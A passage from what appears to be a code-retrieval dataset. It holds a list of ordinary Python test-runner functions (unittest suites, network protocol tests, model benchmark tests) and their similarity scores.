good_car.drive(i)))\n print(\"{:12} drove {:2}km\".format(bad_car.name, bad_car.drive(i)))\n\n \"\"\"final states of the cars\"\"\"\n print(good_car)\n print(bad_car)", "def run_tests(self):\n\n self.manifest_path = os.path.join('tests',\n 'remote',\n 'manifest.ini')\n TestRun.run_tests(self)", "def test_routers(self):\n if self.output_file == '':\n self.run_suite()\n else:\n with open(self.output_file, \"w\") as fp:\n self.run_suite(fp)", "def init(self):\n \n self._nc_session = TestBedTests.TBNetconfSession(self.log, self.loop)\n self._nc_proxy = TestBedTests.TBNetconfProxy(self._nc_session, UtCompositeYang, self.log)\n self._netconf_test_objects = []\n self._pbreq_test_objects = []\n\n for cls in NETCONF_TESTS:\n obj = cls(self._dts, self.log, self._nc_proxy, self._loop)\n yield from obj.dts_self_register()\n self._netconf_test_objects.append(obj)\n\n 
for cls in PBREQ_TESTS:\n obj = cls(self._dts, self.log, self._nc_proxy, self._loop)\n yield from obj.dts_self_register()\n self._pbreq_test_objects.append(obj)\n\n @asyncio.coroutine\n def run_all_tests(xact_info, action, ks_path, msg):\n ro1 = yield from self.run_tests(self._netconf_test_objects, msg.continue_on_failure)\n if ro1.failed_count is 0 or msg.continue_on_failure is True:\n ro2 = yield from self.run_tests(self._pbreq_test_objects, msg.continue_on_failure)\n\n ro = RwAgentTestbedYang.AgentTestsOp()\n ro.total_tests = ro1.total_tests + ro2.total_tests\n ro.passed_count = ro1.passed_count + ro2.passed_count\n ro.failed_count = ro1.failed_count + ro2.failed_count\n #ro.failed_tests = ro1.failed_tests + ro2.failed_tests\n\n xpath = \"O,/agt-tb:agent-tests\"\n xact_info.respond_xpath(rwdts.XactRspCode.ACK, xpath, ro)\n\n @asyncio.coroutine\n def run_all_netconf_tests(xact_info, action, ks_path, msg):\n ro = yield from self.run_tests(self._netconf_test_objects)\n xpath = \"O,/agt-tb:agent-tests\"\n xact_info.respond_xpath(rwdts.XactRspCode.ACK, xpath, ro)\n\n @asyncio.coroutine\n def run_all_pbreqs_tests(xact_info, action, ks_path, msg):\n ro = yield from self.run_tests(self._pbreq_test_objects)\n xpath = \"O,/agt-tb:agent-tests\"\n xact_info.respond_xpath(rwdts.XactRspCode.ACK, xpath, ro)\n \n # Register for all test-cases\n yield from self._dts.register(\n xpath=\"I,/agt-tb:agent-tests/agt-tb:all\",\n flags=rwdts.Flag.PUBLISHER,\n handler=rift.tasklets.DTS.RegistrationHandler(on_prepare=run_all_tests))\n\n # Register for per category all test-cases\n yield from self._dts.register(\n xpath=\"I,/agt-tb:agent-tests/agt-tb:netconf-tests/agt-tb:all\",\n flags=rwdts.Flag.PUBLISHER,\n handler=rift.tasklets.DTS.RegistrationHandler(on_prepare=run_all_netconf_tests))\n\n yield from self._dts.register(\n xpath=\"I,/agt-tb:agent-tests/agt-tb:pb-request-tests/agt-tb:all\",\n flags=rwdts.Flag.PUBLISHER,\n handler=rift.tasklets.DTS.RegistrationHandler(on_prepare=run_all_pbreqs_tests))", "def test_network(self, weights, env, episodes, seed, network=None, timeout=None):\n return self.run(\n backend_test_network, weights, #model creation params\n self.network_generator, env, episodes, seed, #test network params\n timeout=timeout\n )", "def run(self) -> None:\n self.test_sanity()\n if self.has_errors():\n return\n\n tests: List[Callable[[], None]] = [\n self.test_headlines_predefined,\n self.test_headlines_required,\n self.test_headlines_dependencies,\n self.test_headlines_order,\n self.test_headlines_named_entities,\n self.test_named_entities,\n self.test_reading_attributes,\n self.test_forbidden_words,\n self.test_unwanted_words,\n self.test_police_abbreviations,\n self.test_spelling,\n self.test_grammar_rules_regex,\n ]\n\n for test in tests:\n if self.stop_on_error and self.has_errors():\n break\n test()", "def test_01(self):\n if _debug: TestIAmRouterToNetwork._debug(\"test_01\")\n\n # create a network\n tnet = TNetwork()\n\n # test device sends request\n tnet.iut.start_state.doc(\"1-1-0\") \\\n .call(tnet.iut.nse.i_am_router_to_network).doc(\"1-1-1\") \\\n .success()\n\n # network 1 sees router to networks 2 and 3\n tnet.sniffer1.start_state.doc(\"1-2-0\") \\\n .receive(IAmRouterToNetwork,\n iartnNetworkList=[2, 3],\n ).doc(\"1-2-1\") \\\n .success()\n\n # network 2 sees router to networks 1 and 3\n tnet.sniffer2.start_state.doc(\"1-3-0\") \\\n .receive(IAmRouterToNetwork,\n iartnNetworkList=[1, 3],\n ).doc(\"1-3-1\") \\\n .success()\n\n # network 3 sees router to networks 1 and 2\n 
tnet.sniffer3.start_state.doc(\"1-4-0\") \\\n .receive(IAmRouterToNetwork,\n iartnNetworkList=[1, 2],\n ).doc(\"1-4-1\") \\\n .success()\n\n # run the group\n tnet.run()", "def _run_ci_test():\n _run_install(False)\n _run_coverage_html(False)\n _run_typecheck_xml(False)\n _run_lint(True)", "def runTest(self):\n\t\tself.setUp()\n\t\tself.test_postopProgramming1()", "def runTest(self):\n self.setUp()\n self.test_BiplaneRegistration1()", "def test_get_network(self):\n pass", "def main():\n # add all new test suites per test module here\n suite_date = test_date.suite()\n suite_ng = test_ng.suite()\n suite_page = test_page.suite()\n suite_container = test_container.suite()\n\n # add the suite to be tested here\n alltests = unittest.TestSuite((suite_date,\n suite_ng,\n suite_page,\n suite_container))\n\n # run the suite\n runner = unittest.TextTestRunner()\n runner.run(alltests)", "def _run_local_tests(self, *args, **kwargs):\n pass", "def test(self):\n for arch, python in self.python:\n self.run(f\"{python} -m pytest\")", "def run_tests(tests):\n return [test(t) for t in tests]", "def run_all_tests():\n successes = 0\n testsrun = 0\n testsdir = tests_dirpath()\n for test in os.listdir(testsdir):\n path = os.path.join(testsdir, test)\n if os.path.isdir(path):\n testsrun += 1\n if run_test(path):\n successes += 1\n print(\"--- %d/%d TESTS PASSED ---\" % (successes, testsrun))\n return successes == testsrun", "def test_on_all(self) -> None:\n x_test, y_test = self.mnist.test.images, self.mnist.test.labels\n N = self.mnist.test.num_examples\n\n # I have replaced all -1 with self.mb_size to be sure about exact shapes of all layers.\n assert N % self.mb_size == 0,\\\n \"Sorry, mb_size must divide the number of images in test set\"\n\n results = np.array([0., 0.])\n for batch_no in range(N // self.mb_size):\n beg = batch_no * self.mb_size\n end = min(N, (batch_no + 1) * self.mb_size)\n len_batch = end - beg\n batch_results = np.array(self.test_on_batch(x_test[beg:end], y_test[beg:end]))\n results += batch_results * len_batch\n results /= N\n self.logger.info(\"(Test(final): Loss: {0[0]}, accuracy: {0[1]}\".format(results))", "def test():\n import unittest\n testmodules = [\n 'bettermathlib_tests',\n 'randomwebapp_tests',\n ]\n suite = unittest.TestSuite()\n for t in testmodules:\n suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))\n unittest.TextTestRunner(verbosity=2).run(suite)", "def run_training_save_tests():\n test_training_save()\n test_distributed_training_save()\n test_multimodel_training_save()\n test_distributed_multimodel_training_save()", "def exe_tests(self):\n self.rank = mpicom.rank()\n self.size = mpicom.size()\n if mpicom.parallel():\n self.test(\"libname\",os.path.split(mpicom.__file__)[1],\"mpicom.so\")\n else:\n self.test(\"libname\",os.path.split(mpicom.__file__)[1],\"mpistub.pyc\")\n self.test_broadcast()\n self.test_reduce()\n self.test_p2p()\n self.test_gather()\n self.test_scatter()\n #self.test_alltoall()", "def test(all=False):\n\n # Do the import internally, so that this function doesn't increase total\n # import time\n from iptest import run_iptestall\n run_iptestall(inc_slow=all)", "def run(self, args):\n start_time = time.time()\n self._printer.write_update('Collecting tests ...')\n running_all_tests = False\n\n try:\n paths, all_test_names, running_all_tests = self._collect_tests(\n args)\n except IOError:\n # This is raised if --test-list doesn't exist\n return test_run_results.RunDetails(\n exit_code=exit_codes.NO_TESTS_EXIT_STATUS)\n\n test_names = 
self._finder.split_into_chunks(all_test_names)\n if self._options.order == 'natural':\n test_names.sort(key=self._port.test_key)\n elif self._options.order == 'random':\n test_names.sort()\n random.Random(self._options.seed).shuffle(test_names)\n elif self._options.order == 'none':\n # Restore the test order to user specified order.\n # base.tests() may change the order as it returns tests in the\n # real, external/wpt, virtual order.\n if paths:\n test_names = self._restore_order(paths, test_names)\n\n if not self._options.no_expectations:\n self._printer.write_update('Parsing expectations ...')\n self._expectations = test_expectations.TestExpectations(self._port)\n\n tests_to_run, tests_to_skip = self._prepare_lists(paths, test_names)\n\n self._printer.print_found(\n len(all_test_names), len(test_names), len(tests_to_run),\n self._options.repeat_each, self._options.iterations)\n\n # Check to make sure we're not skipping every test.\n if not tests_to_run:\n msg = 'No tests to run.'\n if self._options.zero_tests_executed_ok:\n _log.info(msg)\n # Keep executing to produce valid (but empty) results.\n else:\n _log.critical(msg)\n code = exit_codes.NO_TESTS_EXIT_STATUS\n return test_run_results.RunDetails(exit_code=code)\n\n exit_code = self._set_up_run(tests_to_run)\n if exit_code:\n return test_run_results.RunDetails(exit_code=exit_code)\n\n if self._options.num_retries is None:\n # If --test-list is passed, or if no test narrowing is specified,\n # default to 3 retries. Otherwise [e.g. if tests are being passed by\n # name], default to 0 retries.\n if self._options.test_list or len(paths) < len(test_names):\n self._options.num_retries = 3\n else:\n self._options.num_retries = 0\n\n should_retry_failures = self._options.num_retries > 0\n\n try:\n self._register_termination_handler()\n self._start_servers(tests_to_run)\n if self._options.watch:\n run_results = self._run_test_loop(tests_to_run, tests_to_skip)\n else:\n run_results = self._run_test_once(tests_to_run, tests_to_skip,\n should_retry_failures)\n initial_results, all_retry_results = run_results\n finally:\n _log.info(\"Finally stop servers and clean up\")\n self._stop_servers()\n self._clean_up_run()\n\n if self._options.no_expectations:\n return test_run_results.RunDetails(0, [], [], initial_results,\n all_retry_results)\n\n # Some crash logs can take a long time to be written out so look\n # for new logs after the test run finishes.\n self._printer.write_update('Looking for new crash logs ...')\n self._look_for_new_crash_logs(initial_results, start_time)\n for retry_attempt_results in all_retry_results:\n self._look_for_new_crash_logs(retry_attempt_results, start_time)\n\n self._printer.write_update('Summarizing results ...')\n summarized_full_results = test_run_results.summarize_results(\n self._port, self._options, self._expectations, initial_results,\n all_retry_results)\n summarized_failing_results = test_run_results.summarize_results(\n self._port,\n self._options,\n self._expectations,\n initial_results,\n all_retry_results,\n only_include_failing=True)\n run_histories = test_run_results.test_run_histories(\n self._options, self._expectations, initial_results,\n all_retry_results)\n\n exit_code = summarized_failing_results['num_regressions']\n if exit_code > exit_codes.MAX_FAILURES_EXIT_STATUS:\n _log.warning('num regressions (%d) exceeds max exit status (%d)',\n exit_code, exit_codes.MAX_FAILURES_EXIT_STATUS)\n exit_code = exit_codes.MAX_FAILURES_EXIT_STATUS\n\n if not self._options.dry_run:\n 
self._write_json_files(summarized_full_results,\n summarized_failing_results, initial_results,\n running_all_tests, run_histories)\n\n self._copy_results_html_file(self._artifacts_directory,\n 'results.html')\n if (initial_results.interrupt_reason is\n test_run_results.InterruptReason.EXTERNAL_SIGNAL):\n exit_code = exit_codes.INTERRUPTED_EXIT_STATUS\n else:\n if initial_results.interrupted:\n exit_code = exit_codes.EARLY_EXIT_STATUS\n if (self._options.show_results\n and (exit_code or initial_results.total_failures)):\n self._port.show_results_html_file(\n self._filesystem.join(self._artifacts_directory,\n 'results.html'))\n self._printer.print_results(time.time() - start_time,\n initial_results)\n\n return test_run_results.RunDetails(exit_code, summarized_full_results,\n summarized_failing_results,\n initial_results, all_retry_results)", "def make_all():\n\n if not MASTER.exists():\n os.makedirs(MASTER)\n members = inspect.getmembers(sys.modules[__name__])\n members = [f for f in members if 'test_' in f[0]]\n for member in members:\n print('Running %s...' % member[0], end='')\n member[1](master=True)\n print('done!')", "def make_all():\n\n if not MASTER.exists():\n os.makedirs(MASTER)\n members = inspect.getmembers(sys.modules[__name__])\n members = [f for f in members if 'test_' in f[0]]\n for member in members:\n print('Running %s...' % member[0], end='')\n member[1](master=True)\n print('done!')", "def runTest(self):\n unittest.main()\n ChoreTest.clean_up()", "def main():\n dims = params['dims']\n\n for d in dims:\n print('**** Running test for d={0:d} ****'.format(d))\n run_test(d)", "def _run_tests(self):\n for pyunit_testcase in self.cfg.testcases:\n yield self._run_testsuite(pyunit_testcase)", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover(\"tests\")\n unittest.TextTestRunner(verbosity=2).run(tests)", "def main():\n return run_network_interface_check()", "def unittest():\n from a6test import test_all\n test_all()", "def test_register_network(self):\n pass", "def test():\n import unittest\n tests = unittest.TestLoader().discover(tests)\n unittest.TextTestRunner(verbosity=2).run(tests)", "def RunAll():\n testfunctions = []\n for name, obj in inspect.getmembers(sys.modules[__name__]):\n if inspect.isfunction(obj) and name != 'RunAll':\n testfunctions.append(obj)\n\n # run all the functions\n for f in testfunctions:\n print('Running %s' % str(f))\n f()", "def run_feature_extraction_tests():\n test_feature_extraction()\n test_distributed_feature_extraction()\n test_multimodel_feature_extraction()\n test_distributed_multimodel_feature_extraction()", "def run_tests(remit, sourcelist):\n for source in sourcelist:\n # - move into source's directory\n os.chdir(source)\n # - build worklist of commands\n commands = list()\n commands += test_matrix(remit, source)\n commands += extra_tests(remit, source)\n commands = remove_blacklist(remit, source, commands)\n # - run the commands\n for i, command in enumerate(commands):\n print('[test %s: %s of %d] %s'\n % (source,\n str(i+1).rjust(len(str(len(commands)))),\n len(commands),\n ' '.join(command)))\n subprocess.call(command)\n # - move out of source's directory\n os.chdir('..')", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test_network(self):\n train_accuracy = 100 - percentError(map(self.neural_result,\n self.train_inputs),\n self.train_outputs)\n print 'Train accuracy:', train_accuracy\n\n test_accuracy = 100 - 
percentError(map(self.neural_result,\n self.test_inputs),\n self.test_outputs)\n print 'Test accuracy:', test_accuracy\n\n print '#' * int(train_accuracy), 'TR'\n print '#' * int(test_accuracy), 'TE'", "def execute(self):\n for test in self.tests:\n test.execute()\n self.logger.dump()\n print(\"Finished!\")", "def run_tests(self):\n # Trigger a config change which triggers a deferred hook.\n self.run_charm_change_hook_test('configure_ovs')\n\n # Trigger a package change which requires a restart\n self.run_package_change_test(\n 'openvswitch-switch',\n 'openvswitch-switch')", "def run_tests(self):\n # Trigger a config change which triggers a deferred hook.\n self.run_charm_change_hook_test('configure_ovs')\n\n # Trigger a package change which requires a restart\n self.run_package_change_test(\n 'openvswitch-switch',\n 'openvswitch-switch')", "def test_network(bpn, test_data):\n DisplayNetwork.display_green(\"[INFO] Started to test the network\")\n output = bpn.Run(np.array(test_data))\n return output", "def run_tests(self):\n # Charm does not defer hooks so that test is not included.\n # Trigger a package change which requires a restart\n self.run_package_change_test(\n 'ovn-central',\n 'ovn-central')", "def runWithDirector(global_options, create_input_store=True):\n from ooni.director import Director\n start_tor = False\n director = Director()\n if global_options['list']:\n net_tests = [net_test for net_test in director.getNetTests().items()]\n log.msg(\"\")\n log.msg(\"Installed nettests\")\n log.msg(\"==================\")\n for net_test_id, net_test in net_tests:\n optList = []\n for name, details in net_test['arguments'].items():\n optList.append({'long': name, 'doc': details['description']})\n\n desc = ('\\n' +\n net_test['name'] +\n '\\n' +\n '-'*len(net_test['name']) +\n '\\n' +\n '\\n'.join(textwrap.wrap(net_test['description'], 80)) +\n '\\n\\n' +\n '$ ooniprobe {}/{}'.format(net_test['category'],\n net_test['id']) +\n '\\n\\n' +\n ''.join(usage.docMakeChunks(optList))\n )\n map(log.msg, desc.split(\"\\n\"))\n log.msg(\"Note: Third party tests require an external \"\n \"application to run properly.\")\n\n raise SystemExit(0)\n\n if global_options.get('annotations') is not None:\n global_options['annotations'] = setupAnnotations(global_options)\n\n if global_options.get('preferred-backend') is not None:\n config.advanced.preferred_backend = global_options['preferred-backend']\n\n if global_options['no-collector']:\n log.msg(\"Not reporting using a collector\")\n global_options['collector'] = None\n start_tor = False\n elif config.advanced.get(\"preferred_backend\", \"onion\") == \"onion\":\n start_tor = True\n\n if (global_options['collector'] and\n config.advanced.get(\"preferred_backend\", \"onion\") == \"onion\"):\n start_tor |= True\n\n return runTestWithDirector(\n director=director,\n start_tor=start_tor,\n global_options=global_options,\n create_input_store=create_input_store\n )", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test_03(self):\n if _debug: TestIAmRouterToNetwork._debug(\"test_03\")\n\n # create a network\n tnet = TNetwork()\n\n # test device sends request\n tnet.iut.start_state.doc(\"3-1-0\") \\\n .call(tnet.iut.nse.i_am_router_to_network,\n 
destination=Address(\"1:*\"),\n ).doc(\"3-1-1\") \\\n .success()\n\n # network 1 sees router to networks 2 and 3\n tnet.sniffer1.start_state.doc(\"3-2-0\") \\\n .receive(IAmRouterToNetwork,\n iartnNetworkList=[2, 3],\n ).doc(\"3-2-1\") \\\n .success()\n\n # network 2 sees nothing\n tnet.sniffer2.start_state.doc(\"3-3-0\") \\\n .timeout(10).doc(\"3-3-1\") \\\n .success()\n\n # network 3 sees nothing\n tnet.sniffer3.start_state.doc(\"3-4-0\") \\\n .timeout(10).doc(\"3-4-1\") \\\n .success()\n\n # run the group\n tnet.run()", "def actionRunUnitTests():\n UnitTestRunner.init()\n \n for target in Settings.targets:\n for platform in Settings.targetPlatforms:\n for cpu in Settings.targetCPUs:\n for configuration in Settings.targetConfigurations:\n if not Summary.checkIfActionFailed(ACTION_BUILD, target, platform, cpu, configuration):\n Logger.printStartActionMessage('Running unit tests for ' + target + ' ' + platform + ' ' + cpu + ' ' + configuration, ColoredFormatter.YELLOW)\n result = UnitTestRunner.run(target, platform, cpu, configuration)\n Summary.addSummary(ACTION_RUN_UNITTESTS, target, platform, cpu, configuration, result, UnitTestRunner.executionTime)\n if result != NO_ERROR:\n Logger.printEndActionMessage('Failed to execute unit tests!')\n else:\n Logger.printEndActionMessage('Executed all unit tests')", "def CASE3( self, main ):\n\n from tests.USECASE.SegmentRouting.SRRouting.dependencies.SRRoutingTest import SRRoutingTest\n\n SRRoutingTest.runTest( main,\n test_idx=3,\n onosNodes=3,\n dhcp=1,\n routers=1,\n ipv4=1,\n ipv6=1,\n countFlowsGroups=False,\n linkFailure=False,\n description=\"Ping between all ipv4 and ipv6 hosts in the topology\" )", "def run_tests(self):\n manifest = manifestparser.TestManifest(\n manifests=[os.path.join(self.repository_path, self.manifest_path)],\n strict=False)\n\n tests = manifest.active_tests(**mozinfo.info)\n self._mozmill.run(tests, self.options.restart)\n\n # Whenever a test fails it has to be marked, so we quit with the correct exit code\n self.last_failed_tests = self.last_failed_tests or self._mozmill.results.fails\n\n self.testrun_index += 1", "def test_and_multi_epoch(self):\n\n for epochs in range(10, 100, 10):\n perceptron, network, perceptron_estimated_values, \\\n network_estimated_values, perceptron_unit_error, network_unit_error \\\n = TestPerceptronNetwork.and_setup(epochs)\n\n self.assert_same_results(perceptron, network, perceptron_estimated_values,\n network_estimated_values, perceptron_unit_error,\n network_unit_error)", "def test():\n\n tests = unittest.TestLoader().discover('api/tests/', pattern='*/test_*.py')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def runTest(self):\n self.setUp()\n self.test_FiberDistance1()", "def runTests():\r\n\r\n print(\"running a few tests\")\r\n\r\n average = compute .gpsAverage (4, 5)\r\n print(\"average = \", average)\r\n \r\n print (\"hello!\")", "def run_tests(output_dir, fstype):\n global options\n if options.debug:\n print \"Run NUMA test\"\n for num_disks in [2]:\n for num_dirs in range(1, 5):\n postmark = PostMarkTest(output_dir, fstype, num_disks, num_dirs)\n run_one_test(postmark)", "def runTest(self):\n self.setUp()\n self.test_STLModelBuilder1()", "def run_all_tests():\n model_configs = (model_handler.ModelConfig(\n saved_model_dir=platform_test.test_src_dir_path(\n \"python/compiler/tensorrt/model_tests/sample_model\"),\n default_batch_size=128),)\n if FLAGS.use_tf2:\n model_handler_cls = model_handler.ModelHandlerV2\n trt_model_handeler_cls = model_handler.TrtModelHandlerV2\n 
default_trt_convert_params = DEFAUL_TRT_CONVERT_PARAMS._replace(\n is_dynamic_op=True)\n else:\n model_handler_cls = model_handler.ModelHandlerV1\n trt_model_handeler_cls = model_handler.TrtModelHandlerV1\n default_trt_convert_params = DEFAUL_TRT_CONVERT_PARAMS._replace(\n is_dynamic_op=False)\n for model_config in model_configs:\n trt_convert_params = default_trt_convert_params._replace(\n max_batch_size=model_config.default_batch_size)\n base_model = model_handler_cls(model_config)\n random_inputs = base_model.generate_random_inputs()\n base_model_result = base_model.run(random_inputs)\n trt_fp32_model_result = trt_model_handeler_cls(\n model_config=model_config,\n trt_convert_params=trt_convert_params._replace(\n precision_mode=trt.TrtPrecisionMode.FP32)).run(random_inputs)\n trt_fp16_model_result = trt_model_handeler_cls(\n model_config=model_config,\n trt_convert_params=trt_convert_params._replace(\n precision_mode=trt.TrtPrecisionMode.FP16)).run(random_inputs)\n\n logging.info(\"Base model latency: %f ms\",\n _get_mean_latency(base_model_result))\n logging.info(\"TensorRT FP32 model latency: %f ms\",\n _get_mean_latency(trt_fp32_model_result))\n logging.info(\"TensorRT FP16 model latency: %f ms\",\n _get_mean_latency(trt_fp16_model_result))", "def main_test():\n full = unittest.TestSuite()\n full.addTest(unittest.makeSuite(TestToolOptions))\n full.addTest(unittest.makeSuite(TestBadConfiguration))\n full.addTest(unittest.makeSuite(TestBasicEndpoints))\n full.addTest(unittest.makeSuite(TestMultipleEPG))\n full.addTest(unittest.makeSuite(TestBasicExistingEndpoints))\n full.addTest(unittest.makeSuite(TestBasicExistingEndpointsAddPolicyLater))\n full.addTest(unittest.makeSuite(TestExportPolicyRemoval))\n full.addTest(unittest.makeSuite(TestBasicEndpointsWithContract))\n full.addTest(unittest.makeSuite(TestBasicEndpointMove))\n full.addTest(unittest.makeSuite(TestPolicyChangeProvidedContract))\n full.addTest(unittest.makeSuite(TestChangeL3Out))\n full.addTest(unittest.makeSuite(TestDuplicates))\n full.addTest(unittest.makeSuite(TestDuplicatesTwoL3Outs))\n full.addTest(unittest.makeSuite(TestDeletions))\n\n unittest.main()", "def run_tests():\n fail = []\n okay = []\n for i in os.listdir(\".\"):\n if i.find(\"_test_\") > -1 and i.endswith(\".py\"):\n if 0 != subprocess.call(\"python \" + i, shell=True):\n fail.append(i)\n else:\n okay.append(i)\n if fail:\n print(\"[ERROR] The following %u tests failed: %r\" % (len(fail), fail))\n return False\n print(\"[DONE] All %u tests completely successfully!\" % (len(okay)))\n return True", "def testAutomodeNetwork(self):\n ### create test resources\n instance_name = \"end-to-end-test-instance-1\"\n instance_selfLink = \\\n self.test_resource_creator.create_instance_using_template(\n instance_name,\n self.test_resource_creator.legacy_instance_template_selfLink)[\n 'targetLink']\n original_config = self.google_api_interface.get_instance_configs(\n instance_name)\n auto_subnetwork_name = 'end-to-end-test-auto-subnetwork'\n try:\n network_selfLink = self.google_api_interface.get_network(auto_subnetwork_name)['selfLink']\n except:\n network_selfLink = self.google_api_interface.create_auto_subnetwork(auto_subnetwork_name)['targetLink']\n\n ### start migration\n selfLink_executor = SelfLinkExecutor(self.compute, instance_selfLink,\n auto_subnetwork_name,\n None,\n True)\n\n migration_handler = selfLink_executor.build_migration_handler()\n migration_handler.network_migration()\n\n ### check result\n new_config = 
self.google_api_interface.get_instance_configs(\n instance_name)\n self.assertTrue(\n resource_config_is_unchanged_except_for_network(new_config,\n original_config))\n self.assertTrue(\n compare_instance_external_ip(new_config, original_config))\n # network changed\n self.assertTrue(check_instance_network(new_config,\n network_selfLink,\n ))\n print('Pass the current test')", "def setUp(self):\n sumo_bin = sumolib.checkBinary('sumo')\n traci.start([sumo_bin, \"-n\", self.network_path, \"-r\", self.routes_path])\n traci.simulationStep()" ]
[ "0.7459378", "0.74455136", "0.7278033", "0.71453613", "0.713573", "0.7003208", "0.69377714", "0.6935737", "0.6916369", "0.68943274", "0.6879508", "0.6857769", "0.67931044", "0.6778059", "0.6765904", "0.675124", "0.67291695", "0.66894144", "0.66677123", "0.6644143", "0.66383016", "0.66262877", "0.6606613", "0.65838885", "0.65819764", "0.6575092", "0.6560523", "0.65121496", "0.6498272", "0.6486818", "0.6473093", "0.64716804", "0.6462493", "0.6453718", "0.6447231", "0.64346874", "0.6416155", "0.6393734", "0.63839215", "0.63750714", "0.63733876", "0.63679796", "0.6366267", "0.6364766", "0.6361186", "0.6359695", "0.63449484", "0.63288456", "0.6327869", "0.631808", "0.6306854", "0.62915", "0.629062", "0.62853813", "0.62805665", "0.6279111", "0.6272608", "0.6264477", "0.6261897", "0.6246347", "0.6242292", "0.6236423", "0.6236423", "0.62357223", "0.62352246", "0.62344855", "0.6231711", "0.62198985", "0.62170976", "0.62089044", "0.61940396", "0.618697", "0.6174979", "0.6164178", "0.6163468", "0.61597663", "0.6157005", "0.6155535", "0.6155535", "0.615398", "0.61510664", "0.61473453", "0.6140028", "0.6140028", "0.6140028", "0.6135964", "0.6131416", "0.61288404", "0.6128426", "0.6109904", "0.61080134", "0.6102849", "0.609976", "0.60980934", "0.6088969", "0.60838574", "0.6079074", "0.60788894", "0.607493", "0.60718" ]
0.627527
56
This function will take a vector and construct a polynomial (function) f(x) with each degree having a coefficient from the corresponding value in the vector.
def vecToFunc(vector):
    def f(x):
        f = 0
        for i in range(len(vector)):
            f += vector[i]*x**i
        return f
    return f
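A short usage sketch, assuming the vecToFunc definition above is in scope: the coefficient vector [1, 2, 3] encodes f(x) = 1 + 2x + 3x^2, so f(2) evaluates to 1 + 4 + 12 = 17.

f = vecToFunc([1, 2, 3])   # coefficients ordered from the constant term upward
assert f(0) == 1           # only the constant term survives at x = 0
assert f(2) == 17          # 1 + 2*2 + 3*2**2
print(f(2))                # 17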
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def evaluate_polynomial(f,x):\n degree = len(f)-1\n ans = 0\n for i in f:\n ans += i*x**degree\n degree -= 1\n return(ans)", "def build_poly(x, degree):\n phi = np.ones(len(x))\n phi = np.vstack((phi, [x**(j+1) for j in range(degree)]))\n \n return phi.T", "def polynomial_creator(*coefficients):\n def polynomial(x):\n res = 0\n for index, coeff in enumerate(coefficients):\n res += coeff * x** index\n return res\n return polynomial", "def __getPolynomial(self) -> 'func':\n return lambda x: sum(self.pts[i]*base(x)\n for i, base in enumerate(self.basis))", "def get_poly_fun(fun: XFunction, x: float, degree: int) -> Poly:\n params = get_poly_params(fun, x, degree)\n return Poly(params)", "def poly_func(x):\n \n # Create the polynomial object\n f = np.poly1d([1, -2, -28, 28, 12, -26, 100])\n\n # Return the value of the polynomial\n return f(x) * 0.05", "def _poly_func(x, a, b, c, d, e):\n return a * x ** 6 + b * x ** 5 + c * x ** 4 + d * x ** 3 + e * x ** 2", "def build_poly(x, degree):\n tx = np.zeros((x.shape[0], x.shape[1]*(degree+1)))\n \n for j in range(degree+1):\n tx[:,x.shape[1]*j:x.shape[1]*(j+1)] = np.power(x,j)\n \n return tx", "def poly(x, degree=2):\n x = np.array(x)\n X_trans = np.transpose(np.vstack((x**k for k in range(degree + 1))))\n return np.linalg.qr(X_trans)[0][:, 1:]", "def build_poly(x, degree): \n # ***************************************************\n # COPY YOUR CODE FROM EX03 HERE\n # polynomial basis function: TODO\n # this function should return the matrix formed\n # by applying the polynomial basis to the input data\n # ***************************************************\n raise NotImplementedError", "def get_poly_params(fun: XFunction, x: float, degree: int) -> tuple[float, ...]:\n if degree < 0:\n return (0.0,)\n rhs = np.array([fun(x, order=i) for i in range(degree, -1, -1)])\n mat = np.zeros((degree + 1, degree + 1))\n for i in range(degree + 1):\n for j in range(i + 1):\n mat[i, j] = factorial(degree - j) / factorial(i - j) * x ** (i - j)\n return tuple(np.linalg.solve(mat, rhs))", "def zzX_eval(f, x):\n if hasattr(x, '__iter__'):\n return zzX_eval_list(f, x)\n\n if poly_univariate_p(f):\n return zzx_eval(f, x)\n\n if not x:\n return poly_TC(f)\n\n result = poly_LC(f)\n\n for coeff in f[1:]:\n result = zzX_mul_const(result, x)\n result = zzX_add(result, coeff)\n\n return result", "def zzX_to_poly(f, *symbols):\n from sympy.polys import Poly\n\n terms = {}\n\n for monom, coeff in zzX_to_dict(f).iteritems():\n terms[monom] = Integer(int(coeff))\n\n return Poly(terms, *symbols)", "def general_poly (L):\n def to_apply (x):\n n = 0\n for i in L:\n n = x*n + i\n return n\n return to_apply", "def coefficients_from_Weierstrass_polynomial(f):\n R = f.parent()\n cubic_variables = [x for x in R.gens() if f.degree(x) == 3]\n quadratic_variables = [y for y in R.gens() if f.degree(y) == 2]\n try:\n x = cubic_variables[0]\n y = quadratic_variables[0]\n except IndexError:\n raise ValueError('polynomial is not in long Weierstrass form')\n\n a1 = a2 = a3 = a4 = a6 = 0\n x3 = y2 = None\n for coeff, mon in f:\n if mon == x**3:\n x3 = coeff\n elif mon == x**2:\n a2 = coeff\n elif mon == x:\n a4 = coeff\n elif mon == 1:\n a6 = coeff\n elif mon == y**2:\n y2 = -coeff\n elif mon == x*y:\n a1 = -coeff\n elif mon == y:\n a3 = -coeff\n else:\n raise ValueError('polynomial is not in long Weierstrass form')\n\n if x3 != y2:\n raise ValueError('the coefficient of x^3 and -y^2 must be the same')\n elif x3 != 1:\n a1, a2, a3, a4, a6 = a1/x3, a2/x3, a3/x3, a4/x3, a6/x3\n return [a1, a2, 
